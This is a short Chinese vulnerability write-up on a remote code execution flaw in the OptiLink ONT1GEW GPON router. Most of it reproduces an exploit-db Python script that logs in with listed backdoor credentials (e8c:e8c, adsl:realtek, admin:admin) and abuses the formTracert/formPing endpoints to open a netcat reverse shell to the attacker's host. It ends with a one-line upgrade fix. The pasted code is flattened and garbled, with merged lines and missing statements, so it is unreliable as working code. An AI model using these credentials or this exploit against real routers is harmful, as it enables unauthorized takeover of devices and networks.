0x01 漏洞描述

- 1GE+WIFI路由器远程代码执行漏洞 -


0x02 漏洞验证



在 www.exploit-db.com 上,根据关键词1GE查找到远程命令执行脚本工具。


# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
# Date: 23/03/2021
# Exploit Authors:  Developed by SecNigma and Amal.
# Vendor Homepage:  https://optilinknetwork.com/
# Version: ONT1GEW V2.1.11_X101 Build.1127.190306
# Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above,
# as they do not release the firmware to the public for some unknown reason.
# Additional notes:
# Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306.
# Device Name: ONT1GEW
# Software Version:  V2.1.11_X101
# Build Information: Build.1127.190306
# Chances are that XPONs of C-DATA company are affected too.
# Our research indicated that Optilink devices are just a rebranded version of C-Data.
# This exploit was tested on the following configuration.#!/usr/bin/python3import requests
import argparse
import redef is_login_success(r):match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text)if match:return match# Default configuration
# Router address   =
# LPORT            = 9001
# Default Username = e8c  / Backdoor     /
# Default Password = e8c /  Credentials /parser= argparse.ArgumentParser()parser.add_argument("-t", "--target", dest = "target", default = "", help="Target OptiLink Router IP")
parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True)
parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!")
parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router")
parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router")
args = parser.parse_args()target=args.target,
passw=args.passw# e8c:e8c are the backdoor administrator creds to Optilink devices
# Alternate backdoor credentials are  adsl:realtek, admin:admin.
passw2="e8c"home_url="http://"+target[0]+"/boaform/admin/formLogin"print("[+] Trying to authenticate...")# Authenticate ourselves first
data={'username':user, 'psd':passw}
if res:print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"")print("[-] Exploit failed with the following error:")print(res)print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?")val = input("Press y or n : ")if val[0].lower()=="y":print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"")# Authenticate ourselves with new credsdata={'username':user2, 'psd':passw2}r=requests.post(home_url,data)res2=is_login_success(r)if res2:print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"")print("[-] Exploit failed with the following error:")print(res2)print("[-] Halting Execution.")exit()else:print("Received input "+val+"")print("[-] Halting Execution.")exit()print("[+] Looks like authentication was succesful!")
print("[+] Trying to fetch the WAN Name...")# Fetching Wan Name
# wan_name="1_INTERNET_R_VID_***"get_wan_url = "http://"+target[0]+"/diag_ping.asp"
r=requests.get(get_wan_url)match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text)
wan_name=match[0]print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..")
print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*")
print("[+] If everything went right, you should've gotten a shell right now!")# Starting Exploitation# The same vulnerability exists in formPing and formTracert.
# exploit_url = "http://"+target[0]+"/boaform/admin/formPing"
exploit_url = "http://"+target[0]+"/boaform/admin/formTracert"
# Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :)
# BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it.
# The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload.
# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox


0x03 漏洞修复

  1. 升级路由器至Build.1653.210425及更高版本。


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